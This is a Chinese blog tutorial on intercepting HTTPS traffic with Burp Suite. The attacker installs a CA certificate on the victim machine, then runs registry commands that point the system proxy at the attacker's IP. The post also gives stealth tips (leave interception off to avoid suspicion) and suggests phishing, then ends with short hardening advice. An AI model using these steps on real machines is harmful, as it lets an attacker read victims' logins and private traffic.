??这里的中间人我们借助burpsuite,然后实现本次的一个https劫持攻击。首先我们需要客户端(被攻击者的电脑)信任burpsuite的证书,即进行安装burpsuite的CA证书,具体配置见官方配置。
??通过思考我们发现,目前的利用也是存在有一定的限制的,姑且理解为技术不够。攻击条件主要有以下几方面:
??一、服务器需要是windows主机。
??二、攻击者需要有独立外网主机(或者同一局域网中)。
??三、拥有服务器的远程桌面控制权,或者临时拥有被攻击者的电脑。
??对于第三个条件简单说明下,拥有服务器的远程桌面控制权,不一定能获取到应用系统中存在的敏感数据或者数据库中的数据,例如,你在一个网站(只有一个登陆页面)处检测出了命令执行漏洞,可以执行命令,但是权限不是很高(即使权限很高,除非你只感兴趣服务器的控制权而不是应用系统中的敏感数据),此时我们就可以使用这种攻击方式了!
??操作系统:Microsoft Windows Server 2008 R2 Enterprise,IP:192.168.1.25
??用户权限组:*Users
??使用工具:burpsuite
??攻击者IP:192.168.1.200
??由于我们是要获取被攻击者传过来的数据包,而被攻击者往往都是处于内网,外网访问多数是通过映射出来的,所以我们设置我们的burpsuite的代理为任意ip过来的数据包,如下图所示:
??如果能进入到桌面环境,可以通过图形化界面进行设置IE代理,如下图所示:
??如果不能进入到远程桌面,我们可以使用下面命令进行设置IE代理:
//开启代理!
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
//设置代理ip及端口,为攻击者的ip,端口与burpsuite设置保持一致!
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /d "192.168.1.200:8080" /f
//关闭设置的代理可以使用下面的命令:
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 0 /f
??以上命令经测试只要是users用户组即可成功执行,如下图所示,为了方便我们可以将开启和关闭的命令分别写为bat批处理文件。
??为了不让被攻击者怀疑,我们不要开启截断功能,如下图所示:
??现在攻击者只需要等待被攻击者使用浏览器访问相关网站,即使是https的站点我们同样能劫持到明文数据,如下图所示:
??另外如果只是http的网站的话,上面的攻击难度及危害会大大增加,因为不需要设置客户端去信任中间人的证书这一环节,只需要设置客户端的代理即可,而这一个可以使用钓鱼的方式将开启代理功能的工具进行传播就可以,或者只需要一个简单命令执行shell,普通权限就可以!修复建议参考如下:
??一、对服务器进行安全加固,防止利用服务器漏洞进行攻击!
??二、设置浏览器不要使用默认的系统代理,即IE全局代理!
??三、加强安全意识,离开电脑的时候记得设置密码锁屏,借电脑给别人用的时候尽量在旁边,使用完成后检查是否有异常!
原文地址:http://blog.51cto.com/eth10/2109483